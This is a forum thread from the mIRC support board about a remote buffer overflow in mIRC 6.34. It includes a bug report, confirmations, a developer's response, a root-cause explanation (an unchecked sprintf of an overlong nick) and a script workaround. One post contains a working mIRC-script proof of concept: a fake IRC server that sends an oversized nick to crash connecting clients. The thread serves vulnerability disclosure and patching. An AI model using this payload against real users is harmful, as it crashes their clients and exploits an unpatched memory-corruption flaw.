mIRC Home    About    Download    Register    News    Help

Print Thread
Mirc 6.34 Remote Buffer Overflow #204830 03/10/08 08:38 AM
Joined: Oct 2008
Posts: 1
E
emm1 Offline OP
Mostly harmless
OP Offline
Mostly harmless
E
Joined: Oct 2008
Posts: 1
Hello, I was just notified of this bug here. Hopefully someone can address it quickly.

http://www.milw0rm.com/exploits/6654

Re: Mirc 6.34 Remote Buffer Overflow [Re: emm1] #204831 03/10/08 11:05 AM
Joined: Dec 2002
Posts: 3,138
C
Collective Offline
Hoopy frood
Offline
Hoopy frood
C
Joined: Dec 2002
Posts: 3,138
Confirmed, crashes a clean mIRC 6.34.

Re: Mirc 6.34 Remote Buffer Overflow [Re: emm1] #204832 03/10/08 11:36 AM
Joined: Dec 2002
Posts: 4,829
Khaled Offline
Hoopy frood
Offline
Hoopy frood
Joined: Dec 2002
Posts: 4,829
This is a server-based expoit, not a user-based exploit, so as long as you're connecting to a trusted IRC network, such as one of the major networks, you should be fine.

That said, I can't seem to reproduce this issue here so far, neither in a clean install of the release version nor in a debug version of mIRC.

When I test the perl script and make mIRC connect to the local perl server, nothing happens, other than a disconnect from the server because the server sequence is incorrect.

When I test the same string sequence using internal debugging in mIRC, again nothing happens other than mIRC opening a query window to that user.

I'll continue to try to reproduce this issue and if verified I should have an update out shortly.

Re: Mirc 6.34 Remote Buffer Overflow [Re: Khaled] #204867 04/10/08 12:53 PM
Joined: Jun 2008
Posts: 58
P
Pivo Offline
Babel fish
Offline
Babel fish
P
Joined: Jun 2008
Posts: 58
That Perl Script is crashing both my modified and my clean installation of mIRC.
Screenshot
Windows XP Service Pack 3, mIRC 6.34, ...

Edit: I have translated this into an mIRC script, for easier testing...
To start listening, type /crash ...
Code:
alias crash {
  ; check for open sockets
  if ($sock(crashing*)) {
    sockclose crashing*
    echo -sgt Crash-Sockets closed.
    return
  }

  ; determining port
  var %p = 6667
  while (!$portfree(%p) && %p <= 65535) { inc %p }
  if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return }

  ; listening
  socklisten crashing %p
  if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return }
  echo -sgt Crash-Socket listening...
  echo -sgt Type 04/server localhost %p $+  to crash mirc.
}

on *:socklisten:crashing: {
  var %s = crashing. $+ $ticks
  sockaccept %s
  sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow
  sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow.
  echo -sgt Sending crash-message to $sock(%s).ip
  .timer 1 3 sockclose %s
}

Last edited by Pivo; 04/10/08 03:30 PM.
Re: Mirc 6.34 Remote Buffer Overflow [Re: Pivo] #204892 05/10/08 12:58 AM
Joined: Oct 2008
Posts: 1
D
DONGS Offline
Mostly harmless
Offline
Mostly harmless
D
Joined: Oct 2008
Posts: 1

Re: Mirc 6.34 Remote Buffer Overflow [Re: Khaled] #204899 05/10/08 10:24 AM
Joined: Apr 2004
Posts: 853
Sat Offline
Hoopy frood
Offline
Hoopy frood
Joined: Apr 2004
Posts: 853
The problem is with the sprintf(buf, "f%s", nick); of the code getting the font for the new query window from mirc.ini - buf is 300 bytes, nick is taken directly from the server.

Temporary workaround until the new mIRC is out:
Code:
on ^*:OPEN:?:*:if ($len($nick) > 298) halt

Other, more invasive workarounds: use a dedicated query window, put queries on ignore, etc.


Saturn, QuakeNet staff
Re: Mirc 6.34 Remote Buffer Overflow [Re: Sat] #204962 07/10/08 05:15 PM
Joined: Dec 2002
Posts: 4,829
Khaled Offline
Hoopy frood
Offline
Hoopy frood
Joined: Dec 2002
Posts: 4,829
Thanks, I have been able to reproduce this issue and should have an update ready for release soon. In the meantime, the above script-based fix posted by Sat resolves the issue, as does enabling the "Use single message window" option in the mIRC Options/IRC dialog.

Re: Mirc 6.34 Remote Buffer Overflow [Re: Khaled] #204965 07/10/08 09:59 PM
Joined: Oct 2007
Posts: 51
T
Trashlord_ Offline
Babel fish
Offline
Babel fish
T
Joined: Oct 2007
Posts: 51
Just wanted to add that I have tested this under WINE in Linux, and mIRC crashes there as well.